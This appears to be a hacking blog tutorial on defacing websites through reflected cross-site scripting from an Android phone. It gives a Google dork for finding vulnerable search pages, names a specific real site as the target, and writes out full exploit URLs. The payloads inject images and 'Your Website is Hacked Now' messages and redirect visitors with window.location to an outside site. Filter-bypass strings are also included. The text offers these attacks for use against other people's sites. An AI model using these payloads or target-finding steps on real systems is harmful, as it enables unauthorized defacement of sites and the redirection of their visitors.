How To Hack And Deface Websites On Android Smartphone By XSS Attack Method

Today everyone is aware of the fact that Android Smartphones are very popular in the market and a lot of people are using them. We are not going to discuss why android smartphones are so popular. The matter is Can anyone use Android Smartphone for Website Hacking? I have already mentioned earlier that there are not too much Android Hacking App available in store. Still, a hacker can easily hack and deface thousands of websites (Yes, you read it correctly!!!) with a simple Android Smartphone, Internet Connection and a Web Browser. XSS (often known as Cross Site Scripting)is a method used to hack websites. XSS attack and Sql Injection attack are two most popular and widely used website hacking method. There are literally thousands of websites vulnerable to these attack methods. Most importantly, a hacker can easily hack and deface websites on android smartphone by XSS attack method. Here is a step-by-step guide to hack and deface websites on android smartphone by XSS method.


What is XSS Attack?

Cross Site Scripting (XSS) is a security flaw/loophole/vulnerability, present in websites, which allows a user, to inject malicious codes, on the target website. I hope that you have a basic idea of what XSS attack is . Now, let me describe the effect of XSS attack. If a hacker finds a website vulnerable to XSS attack, he can inject his own HTML or Java Script. And if you are aware of these web designing language then it is quite easy to understand the devastating effect of these malicious codes.


Types of XSS Attack

Basically, there are two types of XSS attack. These are- (i.) Persistent XSS and (2.) Non-persistent XSS. I am not going to explain them in detail since it will make the tutorial boring and lengthy. It is enough to know that in case of persistent XSS, the user input is permanently stored in database which can affect other users too. While in case of Non-persistent attack, user input is shown only to the hacker who has injected the code. So, obviously Persistent XSS attack method is more dangerous.


How to find a Website Vulnerable to XSS attack?

There are many ways to find XSS Vulnerability on Android Smartphone. You can use following methods to do so-

Manual Search-

 
You can search websites manually to find XSS Vulnerability in a website. To find the vulnerability, you need to input some Java Script code in input field of website. You can input Java Script code in Search Box, Comment Section, Forum Post to check it. The most common code you can use is - <script>alert("hi")</script>. If the webpage shows a pop-up window with message "hi" then the website is vulnerable to XSS attack.

Web Vulnerability Checker-

There are many software available for free download which scans the whole website to find a vulnerability. You can use such software to find XSS vulnerability on a particular website. Acunetix Web Vulnerability Checker software is probably the best software in this category. Download Acunetix web Vulnerability Checker from internet and install it in your system. Open the web vulnerability checker and input the website which you want to hack. It will scan the whole website in order to find any vulnerability including XSS too.

Google Dork- 

 

You can use Google Dorks effectively to find websites vulnerable to XSS attack. I have already explained Google Dorks in Havij Tutorial. The best Google Dork to find XSS Vulnerability is inurl:search.php?q=. Input this term in Google Search Box. It will provide you thousands of websites which may be vulnerable to XSS attack. You have to check if a website is vulnerable or not. To do so, you have to insert Java Script code in address bar. For example, I have found following site by using Google Dork:- http://www.theecologist.org/search.php?q=. So, now I have to insert a code in address bar to check whether it is vulnerable to XSS attack or not. 

Hence, I inserted this code in address bar:- http://www.theecologist.org/search.php?q=<script>alert("hi")</alert>. After opening the web address a pop-up screen with "hi" message is displayed on website which means that it is vulnerable to XSS attack.

What to do with a Website Vulnerable to XSS attack?
 
There are many tasks you can perform once you find a XSS Vulnerable site. You can deface the website which is the coolest thing to do. Defacing the website means that the hacker has changed the original content of website with the content of his own. There are a few code which you can use to do so-

(i.) <html><body><img src="http://www.abc.com/your-image.jpg" /></body></html>

You can use this code to upload any image of your choice on the website. 

Syntax- http://www.theecologist.org/search.php?q=<html><body><img src="http://www.code7.co.uk/images/easyblog_images/817/2e1ax_oneweb_entry_hacked-website.jpg" /></body></html>


(ii.) <html><body><center>
<font face="calibri" color="purple" size="05">Your Website is Hacked Now</font></center>
</body></html>

You can use this code to show your message on the website.

Syntax- http://www.theecologist.org/search.php?q=<html><body><center>
<font face="calibri" color="purple" size="05">Your Website is Hacked Now</font></center>
</body></html>



(iii.)  <script>document.body.background="http://www.abc.com/your-image.jpg";</script

You can use this code to change the background image of the website.

(iv.) <script>window.location="http://www.amazinghackingtricks.com";</script>

You can use this code to redirect the website to any other website. You can use this to redirect XSS Vulnerable site to your defacement page uploaded on Internet.

Syntax- http://www.theecologist.org/search.php?q=<script>window.location="http://www.amazinghackingtricks.com";</script>


How to Bypass Filtration Used on many Websites?

Actually, many-a-websites are vulnerable to XSS attack. But, when you input code like <script>alert("hi")</script> on those websites then it results in nothing. The reason is that those websites have slightly advanced filtration mechanism which stops these codes to work. However, you can bypass the filtration by using following codes-

(i.) q="><script>alert('hi')</script>
(ii.) q="><script>alert("hi")</script>
(iii.) q="><script>alert("hi");</script>
(iv.) q="><script>alert("/hi");</script>
(v.) q="><img src='javascript:alert('hi');'>


A Personal Message to You

It is nice to see that you have gone through How to hack and deface websites on android smartphone by XSS attack method. I hope that you have enjoyed the article. However, if you want me to deliver more hacking tutorials and articles then please share my post. You can use Social Sharing Widget provided at the end of every post. After all, Sharing is Caring!!!
Thank You. Have a nice day ahead!!!